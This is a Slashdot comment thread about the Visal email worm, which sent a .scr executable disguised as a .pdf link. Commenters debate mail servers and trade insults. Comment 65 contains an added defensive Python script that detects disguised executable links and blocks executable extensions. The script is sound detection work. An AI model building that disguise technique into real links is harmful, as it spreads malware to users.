    It must be so because I got modded flamebait last time I suggested Windows was more virus prone than alternatives. /rant

    You might have been modded flamebait because your post reads as flamebait. Seriously, read it again with fresh eyes. The subj, and the first three lines/paragraphs. You sound exactly like any random shouty dickhead. Few people would bother reading down to the last paragraph of your post, which contains the only interesting, non-flamebait part; and is the only reason I bothered to reply.

    --
    Science is all about firing a drunk pig out of a cannon just to see what happens.
  53. Re:User & Admin Retards by Anonymous Coward · · Score: 0

    I agree with all the comments except for the bit about "Which *nix is for taking care of such a big system" --- To give you an example - Gmail is not hosted on Outlook/Exchange. The question was about Outlook/Exchange - Alternatives are available including Lotus Notes (I hate the UI, but the server is solid), don't have to invoke *nix on that one. I have personally hosted around 30000 mail boxes on Unix / AIX and smaller ones with Linux, so I don't see 150000 as a big number - Surely Slashdot is full of people who have done this on Linux?

    Ashraya

  54. MS Malware Protection Center info by jamesl · · Score: 1

    Worm:Win32/Visal.B is a new worm, written in Visual Basic, that is currently propagating in part using social-engineering. We strongly encourage customers to be cautious about clicking suspicious or even simply unexpected links in email, even if it's sent by someone you know. Getting infected by Visal.B is an example of what happens if you aren't careful.

    http://blogs.technet.com/b/mmpc/archive/2010/09/09/emerging-malware-issue-visal-b.aspx

    Details here:
    http://www.microsoft.com/security/portal/Threat/Encyclopedia/Search.aspx?query=Visal.B

    And here:
    http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FVisal.B

    1. Re:MS Malware Protection Center info by aarner · · Score: 1

      Only this "new" Visal.B uses the same payload and transmission vectors as Visal.A which was first spotted in the wild six weeks ago:

      http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?Name=Worm%3AWin32%2FVisal.A

      More than enough time for enterprisey-"security" vendors to get the blockware/websense/exchange server A/V up to date. At a minimum, firewall or websense block the 3 URLs Visal uses to transmit the payload.

  55. XP Mode: $89.95 and no DirectX by tepples · · Score: 1

    If you're talking about virtualisation on Windows 7, it comes with a free license for XP

    "Free"? The last time I checked, most PCs sold at big-box stores came with Windows 7 Home Premium, and the upgrade to Windows 7 Professional to unlock XP Mode costs $89.95 plus sales tax. Besides: No. XP Mode does not support 3D graphics APIs such as DirectX.

  56. Re:User & Admin Retards by Anonymous Coward · · Score: 0

    Typical MS drone...There are quite a few very decent "exchange alternatives". Take Zimbra for instance. Very simple to install and use at very large scales (tens of millions of users as in what Comcast deploys for Comcast.net). Problem is, all the MS Exchange Drones have no clue about how email systems work so they make stupid statements about there not being any good alternatives. Interesting thing is...in trials Exchange could not scale to support the number of users...not to mention the outrageously high amounts of money Microsoft wanted to "make it work"

  57. Re:FLAMEBAIT article!!!!!!!!1one Windows is so sec by Anonymous Coward · · Score: 0

    Woosh....

  58. But... but... but... by Anonymous Coward · · Score: 0

    I told my management that what they have in their inbox, basically, is a list of people to get the axe when the next round of layoffs comes around. Can't create a more accurate list of people who are truly the bottom of the barrel, and do not belong in an organization that's supposedly charged with billions of investors' and depositors' money.

    The problem with that logic is that such a list of people probably includes your management, whom you told this to. Recommending that a person gets the axe is not a very successful self-axe-avoiding technique when the target of your attack is who decides whether you're next.

  59. Our office was hit by this yesterday. by Anonymous Coward · · Score: 0

    First, I received the same virus email about three times.

    Then I received an email from IT sent to the entire company about how vitally important it was not to click the link.

    Then I received two or three more emails from IT correcting the initial warning emails.

    But the best part was receiving the email from some poor sucker who had clicked Reply All to the spam email (copying nearly the entire company), said something to the effect of "Hey, your link isn't working... maybe you should try resending it?" and included a screenshot of the company firewall security message.

    Best laugh I've had at the office in weeks.

  60. Re:User & Admin Retards by Anonymous Coward · · Score: 0

    150K email addresses in one country * 10 (I'm assuming the other 100 countries add up to the same volume as the US)? So only 1.5M email addresses? You think that's large?

    I guess you would considering yours is so small.
    BEHOLD!
    8============O (3x larger than yours, AND I have the balls too)

  61. Great Detective Work! by Anonymous Coward · · Score: 0

    However, that is only the name shown in the link. If you look at the actual URL where the script is located it is in fact members.multimania.co.uk. So, don't throw bricks through any windows yet.

  62. Re:User & Admin Retards by Anonymous Coward · · Score: 0

    Umm...a German telco has a setup running a customised Debian/Squirrel instance that has over 13 million email accounts on it...

  63. Re:User & Admin Retards by Anonymous Coward · · Score: 0

    Have you got something better that can support 150,000 unique email addresses in the United States alone????

    Um, every email system ever? 150k is no big thing.

    Call us when your user count gets into the tens of millions.

  64. Re:FLAMEBAIT article!!!!!!!!1one Windows is so sec by Requiem18th · · Score: 1

    Admittedly it's not my best post but I get fed up from time to time.

    --
    But... the future refused to change.
  65. Re:User & Admin Retards by Anonymous Coward · · Score: 0

    You use what the company tells you to.

    Let's follow that down the chain of command...hm...so it was the admins who mandated that? No? How about technical management? No? Oh, it was the clueless airbag at the executive level...

    This wasn't an .exe file. It was a .scr file that was encapsulated in HTML to make it look like a .pdf. If you had HTML enabled, you'd only see a .pdf.

    Jesus on a jumping pogo stick, you still have rendering issues due to Outlook borrowing the Trident engine?!?? WTF?!?!

    Have you got something better that can support 150,000 unique email addresses in the United States alone???? Do you wanna add 100 additional countries to that, with all the additional email addresses? No, please! Amuse us. Tell us how wonderful your particular flavor of *nix is for taking care of such a big system.

    Really? You expect me to believe a single Exchange box will handle those volumes adequately?!? Having run both setups, I can tell you there's a fat-factor of about 3x involved in getting Exchange to handle the same damn mail volume (i.e. you need 3x the hardware to get the same level of service). Come back when I can hear you over the sound of my insane laughter pointed in your direction...

    Oh, and we still use a *nix box to protect the soft underbelly of our Exchange server...

    - What retard still allows exe files to pass through e-mail?

    See above.

    Really? REALLY? I've been blocking this kind of crap since '01. Number of infections due to zero-day exploits: ZERO. Annual email volume processed: embarrassingly low, just 750,000 parcels / year for the last decade. That's only 7.5 million emails. A drop in the bucket.

    - What retard still allows their users to run as root/admin?

    See above.

    You're kidding right? We FIRE people for doing that...
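    Two posts above make the same point from different angles: the name shown in a link is not where the link goes (comment 61), and a `.scr` can be dressed up in HTML so the reader sees a `.pdf` (this one). JakFrost also wished the web gateway had simply refused direct downloads of executable extensions. The following is an added example of both checks, not code from any product named in the thread; the extension lists, the sample message and the `.invalid` hostnames are constructed for the example.

```python
"""
Link inspection for the disguise described in the thread: anchor text that looks like a
document (or a .pdf URL) while the real href ends in a directly executable extension.
Added example, not code from any product mentioned in the thread. Extension lists and
the sample message are constructed; .invalid hostnames are reserved placeholders.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse
import posixpath

# Extensions Windows runs directly when opened (constructed policy list, extend as needed).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".cpl", ".pif", ".bat", ".cmd", ".vbs", ".js", ".msi"}
# Extensions a user expects to be harmless documents.
DOCUMENT_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> element in the body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _ext_of(s):
    """Lower-cased extension of the last path component; query strings are ignored."""
    path = urlparse(s).path if "://" in s else s
    return posixpath.splitext(path)[1].lower()


def gateway_should_block(url):
    """Web-gateway rule JakFrost wished for: refuse direct downloads of executable files,
    including double extensions such as doc.pdf.scr (only the last extension counts)."""
    return _ext_of(url) in EXECUTABLE_EXTS


def inspect_links(html_body):
    """Return one finding per link to an executable. A link whose visible text carries a
    document extension while the href is executable is reported as disguised, which is
    the .scr-shown-as-.pdf trick above; the real host comes from the href, not the text."""
    collector = _LinkCollector()
    collector.feed(html_body)
    findings = []
    for href, text in collector.links:
        href_ext = _ext_of(href)
        if href_ext not in EXECUTABLE_EXTS:
            continue
        text_ext = _ext_of(text)
        if text_ext in DOCUMENT_EXTS:
            reason = "disguised executable: shown as %s, href is %s" % (text_ext, href_ext)
        else:
            reason = "direct link to executable %s" % href_ext
        findings.append({"href": href, "text": text,
                         "host": urlparse(href).hostname or "", "reason": reason})
    return findings


# Constructed message body in the style the thread describes.
SAMPLE_HTML = """<html><body>
<p>Hello, please find the document here:</p>
<p><a href="http://members.example-host.invalid/files/Document_2010.pdf.scr">
http://www.example.invalid/files/Document_2010.pdf</a></p>
<p>Also see the <a href="http://intranet.corp.invalid/reports/q3.pdf">quarterly report</a>.</p>
</body></html>"""

if __name__ == "__main__":
    for f in inspect_links(SAMPLE_HTML):
        print("%s -> %s (%s)" % (f["text"], f["href"], f["reason"]))
```

    On the constructed message the first link is reported as a disguised executable hosted on `members.example-host.invalid`, while the genuine intranet `.pdf` passes. The same `_ext_of` helper drives the gateway rule, so `doc.pdf.scr` is blocked by its last extension regardless of what precedes it; a client that renders HTML has to apply this to the `href`, since that is the only thing the user's click follows.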

  66. You're a scrawny worm, you 8 digit LUser id by Anonymous Coward · · Score: 0

    See subject-line and look in a mirror, because you're nothing but a worm. A scrawny little 8 digit register luser id bearing worm at slashdot no less.

  67. Simple solution by schizz69 · · Score: 1

    Don't use MS Outlook. There are plenty of alternatives out there, for instance Mozilla Thunderbird.

  68. have you not heard of gmail? by Anonymous Coward · · Score: 0

    I never get viruses, heck, I don't even see spam in my inbox lately.
    This is only a problem of people who have mail services that are stupid.